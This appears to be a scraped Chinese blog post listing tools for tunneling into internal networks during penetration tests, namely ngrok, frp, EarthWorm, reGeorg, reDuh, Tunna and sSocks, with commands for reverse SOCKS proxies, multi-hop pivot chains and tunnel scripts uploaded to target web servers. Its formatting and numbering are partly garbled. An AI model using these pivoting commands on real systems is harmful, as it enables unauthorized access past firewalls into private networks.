33559 www.cn blogs.com/xiaozi/p/13589138.html
1、ngrok
ngrok是一个反向代理,用于在公共端点和本地运行的Web服务之间建立安全通道。
官方网站地址:
https://ngrok.com使用说明:
)1)登录ngrok官网注册账号,下载ngrok。
)2)在对象设备中输入许可证代码,执行ngrok。
./ngrok authtoken认证码(3)将HTTP隧道转发到本地端口80。 如下图所示,可以通过外部网域名称访问本地端口80。
./ngrok http 80
2、frp
frp是一种高性能的反向代理APP应用,可以方便地穿透内部网、为外部网提供服务、支持tcp、http、https等协议类型,以及支持基于域名的路由转发
git项目地址:
https://github.com/fatedier/frp使用说明:
1 )将frps和frps.ini放置在具有公共IP的机器上,修改frps.ini文件,并配置名为ssh的反向代理。
# FRPS.ini [ common ] bind _ port=7000 [ ssh ] listen _ port=6000 auth _ token=123 (2)启动frps :
./frps-c./frps.ini(3)将frpc和frpc.ini放在内部网环境中的计算机上,修改frpc.ini文件,并将frps所在服务器的IP设置为x.x.x.x
# frpc.ini [ common ] server _ addr=192.168.172.131 server _ port=7000 auth _ token=123 [ ssh ] type=TCP local
./frpc-c./frpc.ini(5)假设您的用户名为test,通过ssh访问内部网服务器。
sh-p 6000 test @ x.x.x.x http://www.Sina.com /
一个命令解析的对外联网的访问不需要配置,一个命令从外联网到你的内联网的访问不再是距离。 支持Ngrok客户端、Windows、Linux、Mac,提供python、PHP等版本。
官方网站地址:
https://www.ngrok.cc使用说明:
)1)开通http隧道,设置隧道协议、本地端口等信息。
)2)用隧道id启动隧道。
)通过公共网络访问域名可以访问内部网的站点。
3、健壮的绿茶-Ngrok
基于ngrok的内部网映射工具。 免费版本提供http、tcp、udp完全隧道透明、随机域名/随机tcp、udp端口、域名/端口非法强制交换以及自定义本地端口。
下载到:
3359购买natapp.cn (1)隧道并设置隧道协议和本地端口。
)2)下载客户端,前往目标主机,然后运行natapp。
)3)复制natapp分配的URL,用浏览器访问后,发现内部网的透明成功了!
4、Natapp
EW是一种便携式网络透明工具,具有部署SOCKS v5服务和端口转发两个主要功能,可在复杂的网络环境中实现网络透明。
支持Windows、Linux、MacOS和Arm-Linux。
项目地址:
http://rootkiter.com/EarthWorm用法:
(1)适用于向SOCKS v5服务器,在目标网络边界存在公共网络IP,可以任意打开监听端口的情况。
./ew-sssocksd-l1080(2)反弹SOCKS v5服务器。 适用于目标网络边界不存在公共网络IP的情况,需要以反弹方式创建socks代理
a )首先,在具有公共网络ip的主机a上运行以下命令:/ew -s rcsocks -l 1080 -e 8888 b )在目标主机b上启动SOCKS v5服务,并连接到公共网络主机上的8888端口./ew-sRSsocks-d1.1.1-e888
##二级级联测试用例#方式一: lcx _ tran $./ew-sssocksd-l 9999 $./ew-slcx _ tran-l 1080-f 127.0.0.1-g 9999 #
式二: $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999## 三级级联测试用例 $ ./ew -s rcsocks -l 1080 -e 8888 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 $ ./ew -s lcx_listen -l 9999 -e 7777 $ ./ew -s rssocks -d 127.0.0.1 -e 77776、reDuh
ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具,通过在服务器上传JSP/PHP/ASP脚本,就可以轻易地连接到服务器后面的主机。
github项目地址:
https://github.com/sensepost/reDuh(1)上传服务端jsp脚本到目标机器
(2)使用reDuh客户端连接服务端脚本上传后的地址。
java -jar reDuhClient.jar http://192.168.172.1/reDuh.jsp7、reGeorg
reGeorg是reDuh的继承者,利用了会话层的socks5协议,结合Proxifier使用效率会更高。
下载地址:
https://github.com/sensepost/reGeorg使用方法:
(1)将 tunnel脚本(aspx | ashx | jsp | php)上传到Web服务器,访问显示“Georg says, ‘All seems fine’“,表示脚本运行正常。
(2)在攻击者机器上,启动reGeorgSocksProxy.py,监听9999端口,看到 Checking if Georg is ready,确认正常运行。
8、Tunna
Tunna是一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。
github项目地址:
https://github.com/SECFORCE/Tunna9、sSocks
sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试。
下载地址:
http://sourceforge.net/projects/ssocks/使用方法:
(1)正向代理
./ssocksd --bind 192.168.172.131 --port 1234(2)反向代理
## 监听6020端口转发到6010./rcsocks -l 6020 -p 6010 -vv## 反向连接代理主机6010端口./rssocks -s 192.168.172.131:6010 -vv本文由Bypass整理发布,转载请保留出处。